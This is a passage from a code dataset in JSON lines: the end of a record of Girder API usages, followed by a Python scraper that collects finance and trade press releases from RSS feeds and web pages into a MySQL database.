"girder.constants.AccessType", "line_number": 17, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 31, "usage_type": "call"}, {"api_name": "girder.logger.debug", "line_number": 36, "usage_type": "call"}, {"api_name": "girder.logger", "line_number": 36, "usage_type": "name"}, {"api_name": "girder.logger.error", "line_number": 39, "usage_type": "call"}, {"api_name": "girder.logger", "line_number": 39, "usage_type": "name"}, {"api_name": "girder.models.user.User", "line_number": 46, "usage_type": "call"}, {"api_name": "girder.models.file.File", "line_number": 47, "usage_type": "call"}, {"api_name": "girder.constants.AccessType.READ", "line_number": 47, "usage_type": "attribute"}, {"api_name": "girder.constants.AccessType", "line_number": 47, "usage_type": "name"}, {"api_name": "girder.models.item.Item", "line_number": 48, "usage_type": "call"}, {"api_name": "girder.models.file.File", "line_number": 60, "usage_type": "call"}, {"api_name": "girder.constants.AccessType.READ", "line_number": 62, "usage_type": "attribute"}, {"api_name": "girder.constants.AccessType", "line_number": 62, "usage_type": "name"}, {"api_name": "girder.logger.error", "line_number": 66, "usage_type": "call"}, {"api_name": "girder.logger", "line_number": 66, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 69, "usage_type": "call"}, {"api_name": "girder.models.file.File", "line_number": 69, "usage_type": "call"}, {"api_name": "girder.logger.error", "line_number": 71, "usage_type": "call"}, {"api_name": "girder.logger", "line_number": 71, "usage_type": "name"}, {"api_name": "girder_large_image_annotation.models.annotation.Annotation", "line_number": 78, "usage_type": "call"}, {"api_name": "girder.logger.error", "line_number": 80, "usage_type": "call"}, {"api_name": "girder.logger", "line_number": 80, "usage_type": "name"}, {"api_name": "girder.models.setting.Setting", "line_number": 93, "usage_type": "call"}, {"api_name": "constants.PluginSettings.HUI_QUARANTINE_FOLDER", "line_number": 93, "usage_type": "attribute"}, {"api_name": "constants.PluginSettings", "line_number": 93, "usage_type": "name"}, {"api_name": "girder.exceptions.RestException", "line_number": 95, "usage_type": "call"}, {"api_name": "girder.models.folder.Folder", "line_number": 96, "usage_type": "call"}, {"api_name": "girder.exceptions.RestException", "line_number": 98, "usage_type": "call"}, {"api_name": "girder.exceptions.RestException", "line_number": 100, "usage_type": "call"}, {"api_name": "girder.models.folder.Folder", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 108, "usage_type": "attribute"}, {"api_name": "girder.models.item.Item", "line_number": 110, "usage_type": "call"}, {"api_name": "girder.models.item.Item", "line_number": 112, "usage_type": "call"}, {"api_name": "girder.models.item.Item", "line_number": 118, "usage_type": "call"}, {"api_name": "girder.models.item.Item", "line_number": 125, "usage_type": "call"}, {"api_name": "girder.exceptions.RestException", "line_number": 138, "usage_type": "call"}, {"api_name": "girder.models.folder.Folder", "line_number": 139, "usage_type": "call"}, {"api_name": "girder.exceptions.RestException", "line_number": 141, "usage_type": "call"}, {"api_name": "girder.models.item.Item", "line_number": 143, "usage_type": "call"}, {"api_name": "girder.models.item.Item", "line_number": 146, "usage_type": "call"}, {"api_name": "girder.models.item.Item", "line_number": 149, "usage_type": "call"}, {"api_name": "girder.models.item.Item", "line_number": 151, "usage_type": "call"}, {"api_name": "girder.constants.AccessType.WRITE", "line_number": 157, "usage_type": "attribute"}, {"api_name": "girder.constants.AccessType", "line_number": 157, "usage_type": "name"}, {"api_name": "girder.models.file.File", "line_number": 160, "usage_type": "call"}, {"api_name": "girder.constants.AccessType.READ", "line_number": 162, "usage_type": "attribute"}, {"api_name": "girder.constants.AccessType", "line_number": 162, "usage_type": "name"}, {"api_name": "girder.logger.error", "line_number": 166, "usage_type": "call"}, {"api_name": "girder.logger", "line_number": 166, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 169, "usage_type": "call"}, {"api_name": "girder.models.file.File", "line_number": 169, "usage_type": "call"}, {"api_name": "girder.logger.error", "line_number": 171, "usage_type": "call"}, {"api_name": "girder.logger", "line_number": 171, "usage_type": "name"}, {"api_name": "girder.models.item.Item", "line_number": 175, "usage_type": "call"}]}
+{"seq_id": "455874963", "text": "#! /usr/bin/python3\n\n# web_scraper.py 1st part of the project, to get the data from the \n# websites and store it in a mysql database\n\nimport requests,feedparser,pprint,pymysql,datetime,re,sys\nfrom bs4 import BeautifulSoup\nfrom time import mktime\nfrom datetime import timedelta\nfrom langdetect import detect\nfrom selenium import webdriver\n\ndef dbCred():\n connList = []\n try:\n from db import connection_properties\n conn = pymysql.connect(**connection_properties)\n curr = conn.cursor(pymysql.cursors.DictCursor)\n connList.append(conn)\n connList.append(curr)\n return connList\n except pymysql.err.OperationalError:\n sys.exit(\"Invalid Input: Wrong username/db or password found, please try again\")\n\ndbDets = dbCred()\n\n\n###############################################################################\n#db inserts/updates/country finder/check language and dates functions\n###############################################################################\n\ndef loop_len_of_titles(titles,info,links,dates,source,user):\n for z in range(len(titles)):\n \n country = findCountries(titles[z])\n if country is None:\n country = findCountries(info[z])\n if dates[z].tzinfo is not None:\n dates[z] = dates[z].replace(tzinfo=None)\n \n sevenDaysBehind = datetime.datetime.today() - timedelta(7)\n is_english = detect(titles[z])\n \n if dates[z] > sevenDaysBehind and is_english == 'en':\n \n if isinstance(source, list):\n if(insertIntoDb(titles[z],info[z],links[z],dates[z],source[z],country,user) == False):\n continue\n else:\n if(insertIntoDb(titles[z],info[z],links[z],dates[z],source,country,user) == False):\n continue\n \n else:\n continue\n \n#Find countries\ndef findCountries(desc):\n country = ''\n countries = []\n try:\n findCountry = \"SELECT country_id,country_name FROM countries\"\n dbDets[1].execute(findCountry,)\n rows = dbDets[1].fetchall()\n for row in rows:\n countries.append(row['country_name'])\n \n country_alias = \"SELECT country_id_alias, country_alias FROM countries_aliases\"\n dbDets[1].execute(country_alias,)\n items = dbDets[1].fetchall()\n for i in items:\n countries.append(i['country_alias'])\n \n \n except Exception as e:\n print(str(e))\n \n indexes = [desc.find(country) for country in countries]\n found_countries = [(index,country) for index,country in zip(indexes,countries) if index != -1]\n try: \n country = str(min(found_countries)[1])\n return country\n except:\n pass\n\n#insert data into db \ndef insertIntoDb(title,desc,link,date,source,country,user):\n\n \n try:\n checkDuplicate = \"SELECT * FROM articles\"\n dbDets[1].execute(checkDuplicate,)\n rows = dbDets[1].fetchall()\n for row in rows:\n if row['article_link'] == link:\n return False\n \n except Exception as e:\n print('Error is a :' + str(e))\n \n try:\n sql = \"INSERT INTO articles(article_title,article_desc,article_link,article_date,approval,not_sent,article_source,article_country,user) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n dbDets[1].execute(sql,(title,desc,link,date.strftime('%Y-%m-%d %H:%M:%S'),0,0,source,country,user),)\n dbDets[0].commit()\n return True\n \n except Exception as e:\n print('Error is on into: ' + str(e))\n\ndef insertImgLink(imgLink,link):\n try:\n sql1 = \"UPDATE articles SET img_link = %s WHERE article_link = %s\"\n dbDets[1].execute(sql1,(imgLink,link),)\n dbDets[0].commit()\n except Exception:\n pass\n \n\n###############################################################################\n#Connection functions\n############################################################################### \n\ndef beautiful_soup_conn(url,headers=None):\n try:\n if headers is not None:\n request = requests.get(url,headers=headers,verify=False,timeout=10)\n else:\n request = requests.get(url)\n \n except Exception as e:\n print(str(e))\n return None\n \n soup = BeautifulSoup(request.text,'lxml')\n titles = []\n links = []\n dates = []\n info = []\n \n return (soup,titles,links,dates,info)\n\n\ndef phantom_selenium_conn(url):\n driver = webdriver.PhantomJS()\n driver.get(url)\n soup = BeautifulSoup(driver.page_source,'lxml')\n titles = []\n links = []\n dates = []\n info = []\n \n return (soup,titles,links,dates,info)\n\n\ndef rss(url,parsed=None,is_google=None):\n d = feedparser.parse(url)\n articles = d['entries']\n dates = []\n links = []\n titles = []\n info = []\n sources = None\n \n \n for article in articles:\n \n is_english = detect(article.title)\n \n if is_english == 'en':\n if parsed is not None:\n dates.append(article[parsed])\n else:\n dates.append(article['published'])\n links.append(article['link'])\n titles.append(article['title'])\n if 'summary' in article.keys() :\n info.append(article['summary'])\n elif 'description' in article.keys():\n info.append(article['description'])\n else:\n info.append(article.title_detail['value'])\n\n else:\n continue\n if is_google is not None:\n li = str(article.links[0]['href'])\n lRegex = re.compile(r'(https?:\\/\\/?[\\da-z\\.-]+\\.[a-z\\.]{2,6})')\n mo = lRegex.findall(li)\n source = mo[1]\n sources = source\n if is_google is not None: \n return (titles,info,links,dates,sources)\n else:\n return (titles,info,links,dates)\n\n\n\n###############################################################################\n#RSS functions\n###############################################################################\n\ndef adbNews():\n \n titles,info,links,dates = rss('http://feeds.feedburner.com/adb_news')\n dates = [datetime.datetime.strptime(x,\"%Y-%m-%d %H:%M:%S\") for x in dates]\n loop_len_of_titles(titles,info,links,dates,'https://www.adb.org/','cmorris07@googlemail.com')\n \n\n#handle google alerts\ndef googleAlerts():\n urls = [\n 'https://www.google.com/alerts/feeds/14304456731170822711/5490252527890928599',\n 'https://www.google.com/alerts/feeds/14304456731170822711/3125987915994111902',\n 'https://www.google.com/alerts/feeds/14304456731170822711/3125987915994110836',\n 'https://www.google.com/alerts/feeds/14304456731170822711/10917621377361780908',\n 'https://www.google.com/alerts/feeds/14304456731170822711/10335087150361081398',\n 'https://www.google.com/alerts/feeds/14304456731170822711/16198033950663986430',\n 'https://www.google.com/alerts/feeds/14304456731170822711/9184124621001190741',\n 'https://www.google.com/alerts/feeds/14304456731170822711/6241400375173254463',\n 'https://www.google.com/alerts/feeds/14304456731170822711/14931461957889737766',\n 'https://www.google.com/alerts/feeds/14304456731170822711/13423129096405111750',\n 'https://www.google.com/alerts/feeds/14304456731170822711/3240663568688569318',\n 'https://www.google.com/alerts/feeds/14304456731170822711/8787201316844078335',\n 'https://www.google.com/alerts/feeds/14304456731170822711/10458033540308670343',\n 'https://www.google.com/alerts/feeds/14304456731170822711/10093970578452393789',\n 'https://www.google.com/alerts/feeds/14304456731170822711/10866374380232787945',\n 'https://www.google.com/alerts/feeds/14304456731170822711/3934103197685012426',\n 'https://www.google.com/alerts/feeds/14304456731170822711/8090980585227987112',\n 'https://www.google.com/alerts/feeds/14304456731170822711/4606697022711377182',\n 'https://www.google.com/alerts/feeds/14304456731170822711/3125987915994111499',\n 'https://www.google.com/alerts/feeds/14304456731170822711/10335087150361080607',\n 'https://www.google.com/alerts/feeds/14304456731170822711/5149293183964443130',\n 'https://www.google.com/alerts/feeds/14304456731170822711/240674413678724797',\n 'https://www.google.com/alerts/feeds/14304456731170822711/15697794017020091251',\n 'https://www.google.com/alerts/feeds/14304456731170822711/11638663718329821209',\n 'https://www.google.com/alerts/feeds/14304456731170822711/3188984184713995251'\n ]\n \n \n for url in urls:\n \n titles,info,links,dates,source = rss(url,parsed='updated_parsed',is_google=True)\n dates = [datetime.datetime.fromtimestamp(mktime(x)) for x in dates]\n loop_len_of_titles(titles,info,links,dates,source,'cmorris07@googlemail.com')\n \n\ndef xl():\n \n titles,info,links,dates = rss('http://xlgroup.com/press/rss')\n dates = [datetime.datetime.strptime(x,\"%a, %d %b %Y %H:%M:%S %z\") for x in dates]\n loop_len_of_titles(titles,info,links,dates,'http://xlgroup.com','cmorris07@googlemail.com')\n \n \ndef eib():\n \n titles,info,links,dates = rss('http://www.eib.org/infocentre/press/index.rss')\n dates = [datetime.datetime.strptime(x,\"%a, %d %b %Y %H:%M:%S %Z\") for x in dates]\n loop_len_of_titles(titles,info,links,dates,'http://www.eib.org/','cmorris07@googlemail.com')\n \ndef jbic():\n \n titles,info,links,dates = rss('http://www.jbic.go.jp/en/information/press/feed')\n dates = [datetime.datetime.strptime(x,\"%a, %d %b %Y %H:%M:%S %z\") for x in dates]\n loop_len_of_titles(titles,info,links,dates,'http://www.jbic.go.jp/en','cmorris07@googlemail.com')\n\ndef euler_hermes():\n \n titles,info,links,dates = rss('http://www.eulerhermes.com/rss-euler-hermes-group.xml')\n dates = [datetime.datetime.strptime(x,\"%a, %d %b %Y %H:%M:%S %Z\") for x in dates]\n loop_len_of_titles(titles,info,links,dates,'http://www.eulerhermes.com','cmorris07@googlemail.com')\n \ndef db():\n \n titles,info,links,dates = rss('https://socialmedia.db.com/newsroom/v1/feed/allen')\n dates = [datetime.datetime.strptime(x,\"%a, %d %b %Y %H:%M:%S %Z\") for x in dates]\n loop_len_of_titles(titles,info,links,dates,'https://www.db.com','cmorris07@googlemail.com')\n\ndef clydeco():\n \n titles,info,links,dates = rss('https://www.clydeco.com/feeds/news',parsed='updated_parsed')\n dates = [datetime.datetime.fromtimestamp(mktime(x)) for x in dates]\n loop_len_of_titles(titles,info,links,dates,'https://www.clydeco.com','cmorris07@googlemail.com')\n \n\ndef glencore():\n \n titles,info,links,dates = rss('http://www.glencore.com/media/news/rss/')\n dates = [datetime.datetime.strptime(x,\"%a, %d %b %Y %H:%M:%S %z\") for x in dates] \n loop_len_of_titles(titles,info,links,dates,'http://www.glencore.com','cmorris07@googlemail.com')\n\n###############################################################################\n#Beautiful Soup functions\n############################################################################### \n \ndef dsConceptNews():\n \n main_url = 'http://www.ds-concept.net/en/news/all-news/'\n \n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n articles = soup.find_all(\"li\",{'data-type':'Press'})\n\n for items in articles:\n\n title_text = items.h1.text.strip()\n titles.append(title_text)\n links.append(items.a['href'])\n dates.append(items.span.text.strip())\n\n \n for link in links:\n r = requests.get(link)\n sopa = BeautifulSoup(r.text,'lxml')\n div_container = sopa.find(\"div\",{ \"class\":\"dsc-left-content\" })\n try:\n info.append(div_container.p.text.strip())\n except Exception:\n info.append('')\n pass\n \n dates = [datetime.datetime.strptime(x,'%Y-%m-%d') for x in dates] \n \n loop_len_of_titles(titles,info,links,dates,'http://www.ds-concept.net/en/home/','cmorris07@googlemail.com')\n\n\ndef falconGroup():\n \n main_url = 'https://www.falcongrp.com/news-and-events/'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n sources = []\n \n articles = soup.find_all('article',{'class':'category-news'})\n\n for items in articles:\n \n\n dates.append(items.find('span',{'class' : 'time'}).text.strip())\n titles.append(items.h5.text.strip())\n linkRegex = re.compile(r'(https?:\\/\\/?[\\da-z\\.-]+\\.[a-z\\.]{2,6})')\n mo = linkRegex.search(items.h5.a['href'])\n if mo == None:\n link = 'https://www.falcongrp.com/news-and-events/' + items.h5.a['href']\n source = 'https://www.falcongrp.com/'\n sources.append(source)\n links.append(link)\n else:\n sources.append(mo.group())\n links.append(items.h5.a['href'])\n first_p_elem = items.p\n next_p_elem = first_p_elem.findNext('p')\n info.append(next_p_elem.text.strip())\n\n \n dates = [datetime.datetime.strptime(x,'%d %B, %Y') for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,sources,'cmorris07@googlemail.com')\n \n \ndef thaiExim():\n main_url = 'http://www.exim.go.th/en/newsroom/pressRelease_V2.aspx'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) \\\n AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'\n }\n try:\n \n soup,titles,links,dates,info = beautiful_soup_conn(main_url,headers = headers)\n except Exception as e:\n #print('Thai exim error ' + str(e))\n return None\n\n \n td = soup.find_all('td',{'align' : 'right'})\n for item in td:\n dt_obj = datetime.datetime.strptime(item.span.text + ' 00:00:00','%d %B %Y %H:%M:%S')\n dates.append(dt_obj)\n \n a = soup.find_all('a',onclick=True)\n for item in a:\n titles.append(item.text)\n \n linkRegex = re.compile(r'\\/[\\da-z\\.-_]+\\/[\\da-z\\.-_]+\\/[\\da-z\\.-_]+\\.[a-z\\.]{2,6}')\n \n mo = linkRegex.search(item['onclick'])\n if mo is not None:\n link = 'http://www.exim.go.th' + mo.group()\n links.append(link)\n info.append('')\n \n loop_len_of_titles(titles,info,links,dates,'http://www.exim.go.th','cmorris07@googlemail.com')\n \n\n \n \ndef russianDIF():\n \n main_url = 'https://rdif.ru/Eng_Press/page/1/'\n \n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n prefix = 'https://rdif.ru'\n article_container = soup.find('div',{'class':'app-news-page'})\n articles = article_container.find_all('p')\n \n for items in articles:\n links.append(prefix + items.a['href'].strip())\n titles.append(items.a.text.strip())\n dates.append(items.span.span.text.strip())\n \n for link in links:\n r = requests.get(link)\n sopa = BeautifulSoup(r.text,'lxml')\n p_elem_container = sopa.find('div',{'class':'app-news-page'})\n p_elem = p_elem_container.find_all('p')\n info.append(p_elem[1].text.strip())\n \n dates = [datetime.datetime.strptime(x,'%d.%m.%Y') for x in dates]\n \n \n loop_len_of_titles(titles,info,links,dates,'https://rdif.ru/Eng_Index/','cmorris07@googlemail.com')\n \n \n\ndef misysScraper():\n \n main_url = 'http://www.misys.com/fintech-insights/press-releases/all/'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n \n articles = soup.find_all('li',{'class' : 'list-block list-article'})\n for items in articles:\n \n titles.append(items.h3.text.strip())\n links.append(items.h3.a['href'])\n p_elem = items.find_all('p')\n dates.append(p_elem[0].text.strip())\n info.append(p_elem[1].text.strip())\n \n date_regex = re.compile(r'((\\w)+,(\\s)(\\w)+(\\s)(\\d)+)')\n mo = [date_regex.search(x) for x in dates]\n \n dates = [re.sub('(\\d)((st|nd|rd|th),)',r'\\1',x.group()) for x in mo if x is not None]\n dates = [datetime.datetime.strptime(x,'%d %B %Y') for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,'http://www.misys.com/','cmorris07@googlemail.com')\n \n \n\n \n \ndef baswareScraper():\n \n main_url = 'http://www.basware.com/en-us/news?page=1'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n\n prefix = 'http://www.basware.com' \n \n articles = soup.find_all('a',{'class':'cta-card'})\n for items in articles:\n links.append(prefix + items['href'].strip())\n items.h6.i.extract()\n dates.append(items.h6.text.strip())\n titles.append(items.h3.text.strip())\n \n for link in links:\n r = requests.get(link)\n sopa = BeautifulSoup(r.text,'lxml')\n p_elem_container = sopa.find('div',{'class':'article-text'})\n p_elem = p_elem_container.find_all('p')\n info.append(p_elem[0].text.strip())\n \n dates = [datetime.datetime.strptime(x,'%A, %d %b %Y') for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n \n \n \ndef swiftScraper():\n \n \n main_url = 'https://www.swift.com/insights/press-releases'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n prefix = 'https://www.swift.com'\n \n articles = soup.find_all('div',{'class' : 'ds-1col node node-news view-mode-news_channel clearfix'})\n for items in articles:\n dates.append(items.find('span',{'class':'date-display-single'}).text.strip())\n titles.append(items.h2.text.strip())\n info.append(items.p.text.strip())\n links.append(prefix + items.a['href'])\n \n dates = [datetime.datetime.strptime(x,'%d %B %Y') for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n \n \n \n \ndef cofaceScraper():\n \n \n\n main_url = 'http://www.coface.com/News-Publications/News'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n prefix = 'http://www.coface.com'\n \n articles_container = soup.find('div',{'id' : 'real-content' })\n \n #top article scrape\n h_elem = articles_container.find('h2')\n links.append(prefix + h_elem.a['href'])\n titles.append(h_elem.text.strip())\n info.append(articles_container.find('div',{'class':'to-one'}).text.strip())\n dates.append(articles_container.find('span').text.strip())\n \n #all news block\n articles = articles_container.find('div',{'class':'all_news block'})\n span_dates = articles.find_all('span',{'class':'date'})\n dates += [x.text.strip() for x in span_dates]\n h_titles = articles.find_all('h4')\n titles += [x.text.strip() for x in h_titles]\n p_elem = articles.find_all('p')\n info += [x.text.strip() for x in p_elem]\n links += [prefix + x.a['href'].strip() for x in h_titles]\n \n dates = [datetime.datetime.strptime(x,'%m/%d/%Y') for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n \n \ndef whiteAndCaseScraper():\n \n main_url = 'https://www.whitecase.com/news/newsroom?fulltext=&type=All&service=All&date_start[date]=&date_end[date]=&sort_by=field_date&sort_order=DESC&page=0&field_date[date_start]&field_date_1[date_end]'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n prefix = 'https://www.whitecase.com'\n articles = soup.find_all('a',{'class':'list-item-link'})\n \n for items in articles:\n links.append(prefix + items['href'].strip())\n dates.append(items.span.text)\n titles.append(items.h2.text)\n \n for link in links:\n r = requests.get(link)\n sopa = BeautifulSoup(r.text,'lxml')\n p_elem = sopa.find('section',{'itemprop':'articleBody'})\n info.append(p_elem.p.text.strip())\n \n dates = [datetime.datetime.strptime(x,'%d %b %Y') for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n \n \ndef capitalBusinessCreditScraper():\n \n \n main_url = 'http://www.whiteoaksf.com/Media.html'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n years_div = soup.find_all('div',{'class':'news-L-panel'})\n articles = soup.find_all('div',{'class':'news-R-panel'})\n\n dt = []\n \n #get all years, as in seperate element to rest of date\n years = [x.text.strip() for x in years_div]\n \n for article in articles:\n dates.append(article.find_all('div',{'class' : 'news-date'}))\n \n titles += [x.text.strip() for x in article.find_all('div',{'class':'news-title'})]\n \n links += [x['href'] for x in article.find_all('a',{'class':'news-list'})]\n\n #loop through the len of dates\n for x in range(len(dates)):\n #as dates has another array in it (multidimensional)\n #loop through inner loop here and get text value of content\n for i in dates[x]:\n #as some date formats are different on webpage, parse according to format\n try:\n dt_obj = datetime.datetime.strptime(i.text.lstrip(' ') + ' ' + years[x], '%d %b %Y')\n except ValueError:\n dt_obj = datetime.datetime.strptime(i.text.lstrip(' ') + ' ' + years[x], '%d %B %Y')\n \n info.append('')\n #append to empty list dt\n dt.append(dt_obj)\n \n loop_len_of_titles(titles,info,links,dt,'http://www.whiteoaksf.com/','cmorris07@googlemail.com')\n \n \ndef kuke():\n main_url = 'http://www.kuke.com.pl/en/news/'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n #find_all article elements\n articles = soup.find_all('article',{'class':'news-item'})\n #loop through all article elements\n for items in articles:\n #find div with class date append to dates list\n date_div = items.find('div',{'class':'date'})\n dates.append(date_div.text.strip())\n #append main_url (prefix) to h2 anchor element href\n links.append(main_url + items.h2.a['href'])\n #append h2 text to titles list\n titles.append(items.h2.text.strip())\n #find div with class desc, append text to info list\n desc_div = items.find('div',{'class':'desc'})\n info.append(desc_div.text.strip())\n \n #parse dates into datetime objects\n dates = [datetime.datetime.strptime(x,\"%d.%m.%Y\") for x in dates]\n \n #call function\n loop_len_of_titles(titles,info,links,dates,main_url,'cmorris07@googlemail.com')\n \n \ndef ifc():\n main_url = 'http://www.ifc.org/wps/wcm/connect/news_ext_content/ifc_external_corporate_site/news+and+events/news'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n prefix = 'http://www.ifc.org'\n articles = soup.find_all('div',{'class':'pressroom-item'})\n \n for items in articles:\n date_div = items.find('div',{'class':'pressroom-item-date'})\n dates.append(date_div.text.strip())\n link_div = items.find('div',{'class':'pressroom-item-link'})\n links.append(prefix + link_div.a['href'])\n titles.append(link_div.text.strip())\n info.append('')\n \n dates = [datetime.datetime.strptime(x,\"%b %d, %Y\") for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n\n \ndef ebrd():\n main_url = 'http://www.ebrd.com/news.html'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n articles = soup.find_all('div',{'class':'news-post'})\n for items in articles:\n dates.append(items.div.dt.text)\n links.append(items.a['href'])\n titles.append(items.a['title'].strip())\n info.append(items.div.p.text.strip())\n \n dates = [datetime.datetime.strptime(x,\"%d.%m.%y\") for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,'http://www.ebrd.com','cmorris07@googlemail.com')\n \n \n\ndef nib():\n main_url = 'https://www.nib.int/news_publications'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n\n articles = soup.find_all('div',{'class':'articles_article'})\n for items in articles:\n titles.append(items.h2.text.strip())\n links.append(items.h2.a['href'])\n dates.append(items.span.text.strip())\n info.append(items.p.text.strip())\n \n dates = [datetime.datetime.strptime(x,\"%d %b %Y\") for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,'https://www.nib.int','cmorris07@googlemail.com')\n \n\ndef nexi():\n main_url = 'http://www.nexi.go.jp/en/topics/index.html'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n prefix = 'http://www.nexi.go.jp/en/topics/'\n articles = soup.find('ul',{'id':'topicsTab'})\n li_elems = articles.find_all('li')\n \n for items in li_elems:\n links.append(prefix + items.h3.a['href'].strip())\n dates.append(items.div.text.strip())\n titles.append(items.h3.text.strip())\n \n for link in links:\n r = requests.get(link)\n sopa = BeautifulSoup(r.text,'lxml')\n div_container = sopa.find_all('div',{'class':'cont'})\n p_elem = div_container[1].p.extract()\n info.append(p_elem.text.strip())\n \n \n dates = [datetime.datetime.strptime(x,\"%b %d,%Y\") for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,'http://www.nexi.go.jp/en/index.html','cmorris07@googlemail.com')\n \n \ndef natixis():\n main_url = 'https://www.natixis.com/natixis/jcms/tki_5065/en/press-releases'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n prefix = 'https://www.natixis.com/natixis/'\n article_container = soup.find('div',{'id':'ydu_52785'})\n articles = article_container.find_all('div',{'class':'article'})\n \n for items in articles:\n date_regex = re.compile(r'[0-9]{2}/[0-9]{2}/[0-9]{4}')\n mo = date_regex.search(items.h3.text.strip())\n if mo is not None:\n dates.append(mo.group())\n titles.append(items.h3.text.strip())\n links.append(prefix + items.h3.a['href'].strip())\n if items.p:\n info.append(items.p.text.strip())\n else:\n info.append('')\n \n \n dates = [datetime.datetime.strptime(x,\"%d/%m/%Y\") for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,'https://www.natixis.com/','cmorris07@googlemail.com')\n \n \ndef sompo():\n main_url = 'http://www.sompocanopius.com/news/'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n article_container = soup.find('div',{'class':'module_download_file'})\n articles = article_container.find_all('li')\n \n for items in articles:\n date_regex = re.compile(r'[0-9]{2}_[0-9]{2}_[0-9]{4}')\n mo = date_regex.search(items.a['href'])\n if mo is not None:\n dates.append(mo.group())\n links.append(items.a['href'].strip())\n titles.append(items.a.text.strip())\n info.append('')\n \n dates = [datetime.datetime.strptime(x,\"%d_%m_%Y\") for x in dates]\n \n \n loop_len_of_titles(titles,info,links,dates,'http://www.sompocanopius.com/','cmorris07@googlemail.com')\n \n\n\ndef cdb():\n main_url = 'http://www.cdb.com.cn/English/xwzx_715/khdt/'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n article_container = soup.find('div',{'class':'ld_xwzxlb_Box'})\n article_container.find('div',{'class':'ld_xwzxlb_Boxc'}).extract()\n top_article = article_container.find('div',{'class':'ld_xwzxlb_Boxa'})\n prefix = 'http://www.cdb.com.cn/English/xwzx_715/khdt'\n links.append(prefix + top_article.h2.a['href'].lstrip('.'))\n \n li_elems = article_container.find_all('li')\n \n for a_elem in li_elems:\n links.append(prefix + a_elem.a['href'].lstrip('.'))\n \n for link in links:\n r = requests.get(link)\n sopa = BeautifulSoup(r.text,'lxml')\n div_container = sopa.find('div',{'class':'ld_xl_Box'})\n date_regex = re.compile(r'[0-9]{4}-[0-9]{2}-[0-9]{2}')\n mo = date_regex.search(div_container.find('span').text.strip())\n if mo is not None:\n dates.append(mo.group())\n else:\n dates.append('')\n info.append(div_container.find('p').text.strip())\n titles.append(div_container.h1.text.strip())\n \n dates = [datetime.datetime.strptime(x,\"%Y-%m-%d\") for x in dates]\n \n \n loop_len_of_titles(titles,info,links,dates,'http://www.cdb.com.cn/English/','cmorris07@googlemail.com')\n \n\ndef soc_gen():\n main_url = 'https://www.societegenerale.com/en/s-informer-et-nous-suivre/newsroom/all-press_releases'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n prefix = 'https://www.societegenerale.com'\n articles = soup.find_all('li',{'class':'press-release'})\n \n for items in articles:\n \n links.append(prefix + items.a['href'].strip())\n titles.append(items.a.text.strip())\n dates.append(items.span.text.strip())\n info.append('')\n \n dates = [datetime.datetime.strptime(x,\"%d/%m/%Y\") for x in dates]\n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n \n \n \ndef veb(): \n main_url = 'http://www.veb.ru/en/press/index.php?&from_20=1'\n soup,titles,links,dates,info = beautiful_soup_conn(main_url)\n \n prefix = 'http://www.veb.ru'\n articles = soup.find_all('article',{'class':'news-short__item'})\n \n for items in articles:\n \n dates.append(items.time.text.strip())\n titles.append(items.p.a.text.strip())\n links.append(prefix + items.p.a['href'])\n \n for link in links:\n r = requests.get(link)\n sopa = BeautifulSoup(r.text,'lxml')\n p_elem = sopa.find('article')\n info.append(p_elem.p.text.strip())\n \n dates = [datetime.datetime.strptime(x,\"%d.%m.%Y\") for x in dates]\n \n \n loop_len_of_titles(titles,info,links,dates,prefix,'cmorris07@googlemail.com')\n \n \ndef trafigura(): \n\n\n main_url = 'https://www.trafigura.com/resource-centre?category=Press+Releases'\n soup,titles,links,dates,info = phantom_selenium_conn(main_url)\n \n prefix = 'https://www.trafigura.com'\n article_container = soup.find('div',{'id':'mediasearch-list'})\n articles = article_container.find_all('figure')\n \n for items in articles:\n titles.append(items.find('span',{'class':'title'}).text.strip())\n links.append(prefix + items.a['href'].strip())\n items.p.span.extract()\n dates.append(items.p.text.strip())\n \n for link in links:\n r = requests.get(link)\n sopa = BeautifulSoup(r.text,'lxml')\n p_elem = sopa.find('div',{'class':'full-text'})\n info.append(p_elem.p.text.strip())\n \n \n dates = [datetime.datetime.strptime(x,\"%d %B %Y\") for x in dates] 